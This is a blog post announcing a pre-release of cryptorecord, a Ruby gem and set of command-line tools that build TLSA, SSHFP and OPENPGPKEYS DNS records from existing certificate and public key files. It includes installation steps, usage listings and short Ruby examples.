(pre-)release of <a href="https://github.com/whotwagner/cryptorecord">cryptorecord</a>. Cryptorecords is a ruby gem that provides an API and scripts for creating crypto-related dns-records(e.g. DANE). Currently it supports TLSA, OPENPGPKEYS and SSHFP but I plan to support other records in future. The API doesn't create any keys or certificates. It just takes existing keyfiles to create the DNS-records.<br /> &nbsp;</p> <ul> </ul> <h3>Installation</h3> <p>The gem is available on <a href="https://rubygems.org/">Rubygems</a>. Add this line to your application's Gemfile:</p> <pre> <code> gem 'cryptorecord' </code></pre> <p>And then execute:</p> <pre> <code> $ bundle </code></pre> <p>Or install it yourself as:</p> <pre> <code> $ gem install cryptorecord </code></pre> <h3>Usage</h3> <p>This gem comes with a bunch of handy executables that helps creating the dns-records:</p> <ul> <li>openpgpkeysrecord</li> <li>sshfprecord</li> <li>tlsarecord</li> </ul> <pre> <code> Usage: ./openpgpkeysrecord -u <email> -f <gpgkeyfile> -h, --help This help screen -f PGP-PUBLICKEY-FILE, PGP-Publickey-File --publickeyfile -u, --uid EMAIL email-address </gpgkeyfile></email></code></pre> <pre> <code> Usage: ./sshfprecord [ options ] -h, --help This help screen -f SSH-HOST-KEY-FILE, SSH-Hostkey-File --hostkeyfile -H, --host HOST host -d, --digest DIGEST HASH-Algorithm -r, --read-local-hostkeys Read all local Hostkeys.(like ssh-keygen -r) </code></pre> <pre> <code> Usage: ./tlsarecord [ options ] -h, --help This help screen -f, --certfile CERTIFICATE-FILE Certificatefile -H, --host HOST host -p, --port PORTNUMBER port -P, --protocol PROTOCOL protocol(tcp,udp,sctp..) -s, --selector SELECTOR Selector for the association. 0 = Full Cert, 1 = SubjectPublicKeyInfo -u, --usage USAGE Usage for the association. 0 = PKIX-CA, 1 = PKIX-EE, 2 = DANE-TA, 3 = DANE-EE -t, --mtype MTYPE The Matching Type of the association. 0 = Exact Match, 1 = SHA-256, 2 = SHA-512 </code></pre> <h4>TLSA-Example</h4> <pre> <code> #!/usr/bin/env ruby require 'cryptorecord' selector = 0 mtype = 0 usage = 3 port = 443 proto = "tcp" host = "www.example.com" tlsa = Cryptorecord::Tlsa.new(:selector =&gt; selector, :mtype =&gt; mtype, :usage =&gt; usage, :port =&gt; port, :proto =&gt; proto, :host =&gt; host ) tlsa.read_file("/etc/ssl/certs/ssl-cert-snakeoil.pem") puts tlsa </code></pre> <h4>SSHFP-Example</h4> <pre> <code> #!/usr/bin/env ruby require 'cryptorecord' sshfp = Cryptorecord::Sshfp.new(:digest =&gt; 1, :keyfile =&gt; '/etc/ssh/ssh_host_rsa_key.pub', :host =&gt; 'www.example.com') puts sshfp </code></pre> <h4>OPENPGPKEYS-Example</h4> <pre> <code> #!/usr/bin/env ruby require 'cryptorecord' sshfp = Cryptorecord::Openpgpkeys.new(:uid =&gt; "hacky@hacktheplanet.com") sshfp.read_file("resources/hacky.asc") puts sshfp </code></pre> <h3>Documentation</h3> <p>The documentation can be found at <a href="https://www.rubydoc.info/gems/cryptorecord/">rubydoc.info</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 17 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/download" hreflang="en">Download</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/crypto" hreflang="en">Crypto</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/network" hreflang="en">Network</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=266&amp;2=comment&amp;3=comment" token="8fEI7N9n01EddQ0Ug03YejZAPosvCE9slAcfuGxj-AI"></drupal-render-placeholder> </section> Thu, 17 May 2018 10:13:20 +0000 Hoti 266 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/cryptorecord-0-9-2-released#comments https://tech.feedyourhead.at/content/cryptorecord-0-9-2-released#comments